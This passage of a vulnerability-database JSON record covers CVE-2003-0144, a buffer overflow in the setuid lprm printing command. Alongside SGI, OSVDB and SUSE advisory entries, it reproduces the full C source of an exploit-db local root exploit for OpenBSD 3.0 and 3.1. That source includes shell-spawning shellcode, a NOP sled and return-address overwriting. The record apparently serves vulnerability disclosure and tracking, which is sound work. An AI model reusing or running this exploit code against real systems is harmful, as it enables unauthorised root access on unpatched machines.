URL:\r\nhttp://www.sgi.com/support/security/\r\n\r\nFor issues with the patches on the FTP sites, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\nFor assistance obtaining or working with security patches, please\r\ncontact your SGI support provider.\r\n\r\n ------oOo------\r\n\r\nSGI provides a free security mailing list service called wiretap and\r\nencourages interested parties to self-subscribe to receive (via email) all\r\nSGI Security Advisories when they are released. Subscribing to the mailing\r\nlist can be done via the Web\r\n(http://www.sgi.com/support/security/wiretap.html) or by sending email to\r\nSGI as outlined below.\r\n\r\n% mail wiretap-request@sgi.com\r\nsubscribe wiretap <YourEmailAddress such as aaanalyst@sgi.com >\r\nend\r\n^d\r\n\r\nIn the example above, <YourEmailAddress> is the email address that you wish\r\nthe mailing list information sent to. The word end must be on a separate\r\nline to indicate the end of the body of the message. The control-d (^d) is\r\nused to indicate to the mail program that you are finished composing the\r\nmail message.\r\n\r\n\r\n ------oOo------\r\n\r\nSGI provides a comprehensive customer World Wide Web site. This site is\r\nlocated at http://www.sgi.com/support/security/ .\r\n\r\n ------oOo------\r\n\r\nIf there are general security questions on SGI systems, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\nFor reporting *NEW* SGI security issues, email can be sent to\r\nsecurity-alert@sgi.com or contact your SGI support provider. A support\r\ncontract is not required for submitting a security report.\r\n\r\n______________________________________________________________________________\r\n This information is provided freely to all interested parties\r\n and may be redistributed provided that it is not altered in any\r\n way, SGI is appropriately credited and the document retains and\r\n includes its valid PGP signature.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n\r\niQCVAwUBPqlwkbQ4cFApAP75AQGkWAQAgh7Jw6prsrtxjXy7Wft7zDNoLpkWKj6S\r\nrYhtkk+bc0T2n6gj0qBYbvEi/LXQff/civlaaB9zgaETcARPB02Zq0eFd4SiJAEq\r\nmXHEyUwTxqyI+7JzVXrYBSIDpmSChFM2HPlDDkvelM98xh/Xdy48Rolq0XkOTYwG\r\njS/UH1gQNc4=\r\n=Cssm\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2003-04-26T00:00:00", "title": "Multiple Vulnerabilities in BSD LPR Subsystem on IRIX update", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:07", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0144"], "modified": "2003-04-26T00:00:00", "id": "SECURITYVULNS:DOC:4451", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4451", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T18:30:34", "osvdbidlist": ["7549"], "references": [], "edition": 1, "description": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (2). CVE-2003-0144. Local exploit for unix platform", "reporter": "CMN", "published": "1998-04-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0144"], "modified": "1998-04-22T00:00:00", "id": "EDB-ID:22332", "href": "https://www.exploit-db.com/exploits/22332/", "sourceData": "source: http://www.securityfocus.com/bid/7025/info\r\n \r\nIt has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.\r\n\r\n/*\r\n * lprmexp.c\r\n *\r\n * OpenBSD <= 3.1 lprm(1) local root exploit\r\n *\r\n * By CMN <cmn@darklab.org>/<md0claes@mdstud.chalmers.se>\r\n *\r\n * Tested on OpenBSD 3.0 and 3.1.\r\n *\r\n * Fiddle with -a option from 1 to 7 to indent address in\r\n * buffer.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <sys/types.h>\r\n\r\n#define LPRMPROG \"/usr/bin/lprm\"\r\n#define BUFSIZE 511\r\n#define OFFSET 0\r\n#define NOP 0x90\r\n\r\nstatic char obsdcode[] =\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xb0\\xb7\" /* movb $0xb7, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\x19\" /* movb $0x19, %al */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\x17\" /* movb $0x17, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\x2b\" /* movb $0x2b, %al */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\xb5\" /* movb $0xb5, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */\r\n \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */\r\n \"\\x89\\xe3\" /* movl %esp, %ebx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x89\\xe2\" /* movl %esp, %edx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x52\" /* pushl %edx */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xb0\\x3b\" /* movb $0x3b, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\x40\" /* inc %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xcd\\x80\"; /* int $0x80 */\r\n\r\nu_long\r\ngetesp(void)\r\n{\r\n __asm__(\"movl %esp, %eax\");\r\n}\r\n\r\nvoid\r\nusage(u_char *pname)\r\n{\r\n printf(\"\\n** OpenBSD lprm(1) local root exploit by CMN **\\n\");\r\n printf(\"\\nUsage: %s printer [-o offs] [-r ret] [-a indent]\\n\\n\",\r\n pname);\r\n}\r\n\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n int i;\r\n u_char indent = 0;\r\n u_long raddr = 0;\r\n u_long offset = 0;\r\n u_char buf[BUFSIZE+1];\r\n\r\n if (argc < 2) {\r\n usage(argv[0]);\r\n exit(1);\r\n }\r\n\r\n argc--;\r\n argv++;\r\n\r\n while ( (i = getopt(argc, argv, \"a:r:o:\")) != -1) {\r\n switch (i) {\r\n case 'a':\r\n indent = atoi(optarg) % 8;\r\n break;\r\n\r\n case 'r':\r\n raddr = strtoul(optarg, NULL, 0);\r\n break;\r\n\r\n case 'o':\r\n offset = strtoul(optarg, NULL, 0);\r\n break;\r\n\r\n default:\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n if (!raddr) {\r\n raddr = getesp();\r\n raddr -= offset ? offset : OFFSET;\r\n }\r\n else\r\n raddr -= offset;\r\n\r\n printf(\"Using address 0x%08x\\n\", raddr);\r\n\r\n memset(buf, NOP, BUFSIZE);\r\n memcpy(&buf[BUFSIZE-(indent+4)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+8)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+12)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+16)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+20)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+24)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE]-(strlen(obsdcode)+100),\r\n obsdcode, strlen(obsdcode));\r\n buf[BUFSIZE] = '\\0';\r\n\r\n execlp(LPRMPROG, \"CMN\", \"-P\", argv[0], buf, buf, NULL);\r\n exit(1);\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/22332/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata32.html#lprm)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104690434504429&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104714441925019&w=2\nMail List Post: http://marc.info/?l=bugtraq&m=104690434504429&w=2\nISS X-Force ID: 11473\n[CVE-2003-0144](https://vulners.com/cve/CVE-2003-0144)\nBugtraq ID: 7025\n", "reporter": "Arne Woerner()", "published": "2003-03-05T00:00:00", "title": "lprold lpr Package lprm Command Line Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0144"], "modified": "2003-03-05T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:7549", "id": "OSVDB:7549", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:27:55", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "3.0.48-297", "packageName": "lprold", "packageFilename": "lprold-3.0.48-297.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.1", "packageVersion": "3.0.48-297", "packageName": "lprold", "packageFilename": "lprold-3.0.48-297.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.1", "packageVersion": "3.0.48-407", "packageName": "lprold", "packageFilename": "lprold-3.0.48-407.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "3.0.48-408", "packageName": "lprold", "packageFilename": "lprold-3.0.48-408.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.2", "packageVersion": "3.0.48-407", "packageName": "lprold", "packageFilename": "lprold-3.0.48-407.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.1", "packageVersion": "3.0.48-270", "packageName": "lprold", "packageFilename": "lprold-3.0.48-270.alpha.rpm", "arch": "alpha", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "3.0.48-273", "packageName": "lprold", "packageFilename": "lprold-3.0.48-273.sparc.rpm", "arch": "sparc", "operator": "lt"}], "description": "The lprm command of the printing package lprold shipped till SuSE 7.3 contains a buffer overflow. This buffer overflow can be exploited by a local user, if the printer system is set up correctly, to gain root privileges. lprold is installed as default package and has the setuid bit set.", "edition": 1, "reporter": "Suse", "published": "2003-03-13T16:07:16", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "title": "local privilege escalation in lprold", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-03-13T16:07:16", "id": "SUSE-SA:2003:0014", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00015.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}